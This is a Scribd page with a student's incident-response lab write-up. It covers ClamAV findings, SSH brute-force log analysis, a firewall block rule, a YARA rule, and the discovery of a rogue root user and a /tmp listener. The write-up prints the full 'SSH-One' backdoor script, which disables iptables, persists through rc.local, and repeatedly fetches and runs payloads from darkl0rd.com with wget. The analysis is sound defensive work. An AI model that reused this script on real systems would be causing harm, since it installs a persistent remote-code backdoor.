KEMBAR78
Project | PDF | Secure Communication | Security
Scribd
Upload
15 views4 pages

Project

The document outlines a security assessment involving malware detection and suspicious activity on a virtual machine. ClamAV identified three infected files, including Unix malware and a backdoor script named SSH-One that disables the firewall and connects to a command and control server. Additional analysis revealed unauthorized user creation and a rogue process running with root privileges, indicating potential compromise of the system.

Uploaded by

tangero3124
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
15 views4 pages

Project

The document outlines a security assessment involving malware detection and suspicious activity on a virtual machine. ClamAV identified three infected files, including Unix malware and a backdoor script named SSH-One that disables the firewall and connects to a command and control server. Additional analysis revealed unauthorized user creation and a rogue process running with root privileges, indicating potential compromise of the system.

Uploaded by

tangero3124
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 4

TASK 1 :

========
ubuntu@ubuntu-VirtualBox:~$ cat clamAV_report.txt
/home/ubuntu/Downloads/moni.lod: OK
/home/ubuntu/Downloads/notes.txt: OK
/home/ubuntu/Downloads/SSH-One: OK
/home/ubuntu/Downloads/gates.lod: OK
/home/ubuntu/Downloads/ft32: Unix.Malware.Agent-6774375-0 FOUND
/home/ubuntu/Downloads/ft64: Unix.Malware.Agent-6774336-0 FOUND
/home/ubuntu/Downloads/wipefs: Unix.Tool.Miner-6443173-0 FOUND
/home/ubuntu/Downloads/tmplog: OK

----------- SCAN SUMMARY -----------


Known viruses: 8874078
Engine version: 0.100.3
Scanned directories: 1
Scanned files: 8
Infected files: 3
Data scanned: 2.42 MB
Data read: 2.40 MB (ratio 1.01:1)
Time: 60.816 sec (1 m 0 s)

=========

TASK 2 :
========
1-
ubuntu@ubuntu-VirtualBox:~$ ls -l /home/ubuntu/Downloads/
total 2488
-rw-rw-r-- 1 ubuntu ubuntu 66196 Nov 30 2018 ft32
-rw-rw-r-- 1 ubuntu ubuntu 66504 Nov 30 2018 ft64
-rwxr-xr-x 1 ubuntu ubuntu 5 Mar 12 2019 gates.lod
-rwxr-xr-x 1 ubuntu ubuntu 5 Mar 12 2019 moni.lod
-rw-r--r-- 1 root root 1841 Jun 10 2020 notes.txt
-rwxr-xr-x 1 ubuntu ubuntu 914 Jun 10 2020 SSH-One
-rw-r--r-- 1 ubuntu ubuntu 805 Mar 12 2019 tmplog
-rwxr-xr-x 1 ubuntu ubuntu 2384177 Mar 12 2019 wipefs
----
2- SSH-One File.
==
ubuntu@ubuntu-VirtualBox:~$ cat /home/ubuntu/Downloads/SSH-One
#!/bin/bash
iptables -F
/etc/init.d/iptables stop
chkconfig iptables off
echo "chmod +x /tmp/SSH-T" >> /etc/rc.local
echo "/tmp/SSH-T" >> /etc/rc.local
echo "chmod +x /tmp/SSH-One" >> /etc/rc.local
echo "/tmp/SSH-One" >> /etc/rc.local
m=SSH-T
script=SSH-One
hfs_m=http://darkl0rd.com:7758/SSH-T
hfs_s=http://darkl0rd.com:7758/SSH-One
rm -f /tmp/$m*
while true

do
ps aux | grep $m | grep -v grep
if [ $? -eq 0 ];then
sleep 10
else
ls -l /tmp/$m
if [ $? -eq 0 ];then
/tmp/$m
else
cd /tmp/;wget $hfs_m ; chmod a+x $m;/tmp/$m
fi
fi
ps aux | grep $script | grep -v grep
if [ $? -eq 0 ];then
sleep 10
else
ls -l /tmp/$script
if [ $? -eq 0];then
/tmp/$script
else
cd /tmp;wget $hfs_s ; chmod a+x $script;/tmp/$script
fi
fi
done
--
Suspicious File: SSH-One
Command & Control URL: http://darkl0rd.com:7758/SSH-T and
http://darkl0rd.com:7758/SSH-One

Reason for suspicion:


The script disables the firewall, sets up persistence through rc.local, and
continuously
downloads and executes two files from an external Command & Control server
(darkl0rd.com).
This clearly indicates backdoor/malware behavior even though it was not flagged by
ClamAV.
=========

TASK 3 :
========
unknown threat.yara
----
rule SSH_One_Backdoor
{
meta:
description = "Detects the SSH-One malware script"
author = "A'laa"
date = "2025-06-09"

strings:
$a = "darkl0rd.com"
$b = "iptables -F"
$c = "chmod +x /tmp/SSH-T"
$d = "/tmp/SSH-One"

condition:
all of ($a, $b, $c, $d)
}
---

==========
SEC 2 :
=======

TASK 1 :
--
SCREENSHOT SENT BY USEF
--

TASK 2 :
========

ubuntu@ubuntu-VirtualBox:~$ sudo grep "Failed password" /var/log/auth.log.1 | awk


'{print $(NF-3)}' | sort | uniq -c | sort -nr
232 192.168.99.1
9 192.168.56.1
ubuntu@ubuntu-VirtualBox:~$

ubuntu@ubuntu-VirtualBox:~$ sudo grep "Accepted password" /var/log/auth.log.1


Jun 10 01:26:06 ubuntu-VirtualBox sshd[3053]: Accepted password for ubuntu from
192.168.99.1 port 56531 ssh2
Jun 10 09:49:03 ubuntu-VirtualBox sshd[5542]: Accepted password for ubuntu from
192.168.99.1 port 57157 ssh2
Jun 10 09:51:07 ubuntu-VirtualBox sshd[5808]: Accepted password for ubuntu from
192.168.99.1 port 57162 ssh2
Jun 10 10:18:16 ubuntu-VirtualBox sshd[6241]: Accepted password for ubuntu from
192.168.99.1 port 57679 ssh2
Sep 21 21:40:07 ubuntu-VirtualBox sshd[2732]: Accepted password for ubuntu from
192.168.56.1 port 56596 ssh2
Sep 22 10:53:57 ubuntu-VirtualBox sshd[2843]: Accepted password for ubuntu from
192.168.56.1 port 58331 ssh2

192.168.99.1
Malicious IP

------
task3
=======

IN A FILE NAMED Iptable_rule.txt TYPE :


--
sudo iptables -A INPUT -s 192.168.99.1 -p tcp --dport 22 -j DROP
--

TASK 4 :
========

Jun 10 10:31:05 ubuntu-VirtualBox useradd[7288]: new user: name=voldemort, UID=0,


GID=0, home=/home/voldemort, shell=
--
ubuntu@ubuntu-VirtualBox:~$ awk -F: '($3 == 0) {print}' /etc/passwd
root:x:0:0:root:/root:/bin/bash
voldemort:x:0:0::/home/voldemort:
---
root 944 943 0 08:18 ? 00:00:00 sh
root 947 944 0 08:18 ? 00:00:00 /tmp/remotesec -k -l 56565
---
IN A FILE CALLED backdoor_details.text TYPE :
===

Rogue username: [voldemort]


Malicious process: /tmp/remotesec
Port: 56565

Justification:
The process '/tmp/remotesec' is running with root privileges and is not part of a
standard system process.
It resides in /tmp, which is an unusual location for persistent binaries.
It listens on non-standard port 56565, indicating it's likely a backdoor set up by
the attacker to maintain remote access.
----

TASK 5 :
========

sudo

You might also like